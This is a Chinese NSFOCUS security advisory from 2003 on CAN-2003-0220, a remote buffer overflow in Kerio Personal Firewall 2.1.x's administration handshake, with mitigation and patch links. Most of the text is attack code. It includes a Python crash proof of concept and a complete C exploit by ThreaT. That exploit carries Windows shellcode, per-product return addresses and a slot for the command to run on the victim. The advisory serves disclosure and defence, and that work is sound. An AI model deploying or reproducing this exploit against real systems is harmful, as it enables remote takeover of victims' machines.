首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第41期->最新漏洞
日期:2003-06-03
发布日期:2003-04-28
更新日期:2003-05-15
受影响系统:
Kerio Personal Firewall 2 2.1.4
Kerio Personal Firewall 2 2.1.3
Kerio Personal Firewall 2 2.1.2
Kerio Personal Firewall 2 2.1.1
Kerio Personal Firewall 2 2.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 7180
CVE(CAN) ID: CAN-2003-0220
Kerio Personal Firewall (KPF)是一款个人防火墙系统。
Kerio个人防火墙管理验证处理过程存在问题,远程攻击者可以利用这个漏洞伪造恶意包触发缓冲区溢出,可能以管理员权限在系统上执行任意指令。
当管理员连接防火墙时会进行握手连接,用于建立加密会话,握手的第4个包(第一个包是管理员发送)包含4字节数据,其中有一定固定值0x40 (64)指示后续的包含管理员密钥的包的大小。防火墙端在使用recv()处理这个数据的时候没有进行边界缓冲区检查,如果攻击者伪造包含超大数据的包发送给防火墙,此数据就会被读取到内存缓冲区时而发生缓冲区溢出,精心构建提交数据可能以系统管理员权限在系统上执行任意指令。
<*来源:Core Security Technologies Advisory
链接:http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
http://marc.theaimsgroup.com/?l=bugtraq&m=105242677013515&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
---------------------
import os
import socket
import struct
import string
def g():
fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
fd.connect(('192.168.66.160', 44334))
fd.recv(10)
fd.recv(256)
fd.send(struct.pack('!L', 0x149c))
astr = 'A'*0x149c
fd.send(astr)
except Exception, e:
print e
pass
fd.close()
g()
---------------------
ThreaT(ThreaT@Ifrance.com) 提供了如下测试程序:
/**************************************************************
* Personal Firewall Engine remote buffer overflow Exploit
**************************************************************
*
* Original information shared by CORE Security Technologies.
* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* Released : 30/04/2003
*
* Coded By ThreaT.
* ThreaT@Ifrance.com
* http://s0h.cc/~threat
*
********************************************************************
*
* This exploit take advantage of the vulnerability discovered by
* CORE Security Technologies for execute a command on remote workstations
* equiped with the fallowing PSW :
*
* - Tiny Personal Firewall 2.0.15
* - Kerio Personal Firewall 2.1.4
*
*********************************************************************
*
* Usage : PFExploit.exe <target> <victim_ip> <command to execute>
*
* =====================================================================
* !! compile with : cl.exe /nologo PFExploit.c /link wsock32.lib !!
* =====================================================================
*/
#include <windows.h>
#include <winsock.h>
#define len 0x1494
void main (int argc, char *argv[])
{
SOCKET sock1;
SOCKADDR_IN sin;
int i;
DWORD byte = htonl(len);
char buffer[len], *p,
shellcode[] =
"\xEB\x69\x6A\x30\x5B\x64\x8B\x03\x8B\x40\x0C\x8B\x48\x0C\x8B\xC1"
"\x8B\x70\x30\x80\x3E\x4B\x75\x4A\x8B\x40\x18\x8B\x58\x3C\x03\xD8"
"\x8B\x5B\x78\x03\xD8\x8B\x73\x1C\x03\xF0\x56\x8B\x73\x24\x03\xF0"
"\x56\x8B\x53\x20\x03\xD0\x8B\x5B\x18\x4B\x8B\x34\x9A\x03\xF0\x03"
"\x74\x24\x10\x8B\x36\x39\x74\x24\x0C\x74\x08\x4B\x23\xDB\x75\xEA"
"\x58\x58\xC3\x5F\x33\xC9\x66\x8B\x0C\x5F\x5F\x8B\x3C\x8F\x8D\x04"
"\x07\xC3\x8B\x18\x39\x08\x8B\xC3\x75\xA6\xC3\xEB\x22\x6A\x01\x68"
"\x69\x6E\x45\x78\xE8\x89\xFF\xFF\xFF\x6A\x01\xFF\x74\x24\x0C\xFF"
"\xD0\x6A\x01\x68\x78\x69\x74\x50\xE8\x75\xFF\xFF\xFF\xFF\xD0\xE8"
"\xD9\xFF\xFF\xFF";
WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);
struct _target {
char Name[4];
char *RetAddr;
char *App;
} targ[2] = {
{"TPF" , "\xED\xEA\x2F\x01", "Tiny Personal Firewall 2.0.15"},
{"KPF" , "\xF8\xEA\x61\x01", "Kerio Personal Firewall 2.1.4"},
};
printf ("#############################################################\n"
"Personal Firewall Engine, Remote buffer overflow Exploit !\n"
"#############################################################\n"
"Discovered by CORE Security Technologies & Coded by ThreaT\n-\n"
"ThreaT@Ifrance.com\n"
"http://s0h.cc/~threat\n-\n\n");
if (argc < 4)
{
printf ("usage : PFExploit.exe <target> <victim_ip> <command to execute>\n\n"
"TARGET ARE\n"
"__________\n\n"
"TPF : for Tiny Personal Firewall 2.0.15\n"
"KPF : for Kerio Personal Firewall 2.1.4\n\n");
ExitProcess (0);
}
if (!(p = (char *) LocalAlloc (LPTR,(strlen (shellcode)+strlen(argv[3])+3))))
{
printf ("error, cannot allocate memory\n");
ExitProcess (0);
}
memset (buffer,0x90,len);
strcpy (p,shellcode);
lstrcat (p,argv[3]);
memcpy (&buffer[200],p,strlen (p)+1);
for (i=0; i < 2 ; i++)
if (!lstrcmpi (argv[1],targ[i].Name)) break;
if (i > 1)
{
printf ("Erreur : la cible %s est inconnue\n",argv[1]);
ExitProcess (0);
}
if (WSAStartup(wVersionRequested, &wsadata))
{
printf ("Erreur d'initialisation Winsock\n");
ExitProcess (0);
}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr=inet_addr (argv[2]);
sin.sin_port = htons (44334);
memcpy (&buffer[0x1490],targ[i].RetAddr,4);
printf ("Cible : %s\n\n"
"Connecting to %s...", targ[i].App, argv[2]);
sock1 = socket (AF_INET, SOCK_STREAM, 0);
bind (sock1, (SOCKADDR *)&sin, sizeof (sin));
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) )
{
printf ("connexion failed !\n");
ExitProcess (0);
}
printf ("ok!\n\n"
"sending crash for remote execution of '%s'...",argv[3]);
Sleep (1000);
send (sock1,(const char FAR *)(DWORD)&byte,sizeof (DWORD),0);
send (sock1,buffer,len,0);
puts ("ok");
}
建议:
--------------------------------------------------------------------------------
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 关闭kerio个人防火墙远程管理员接口。
Skin of Humanity security group提供如下第三方补丁:
Source:
http://www.s0h.cc/~threat/goodies/PFpatch/sources_PFpatch.zip
Binary:
http://www.s0h.cc/~threat/goodies/PFpatch/PFpatch.exe
厂商补丁:
Kerio
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.kerio.com/
版权所有,未经许可,不得转载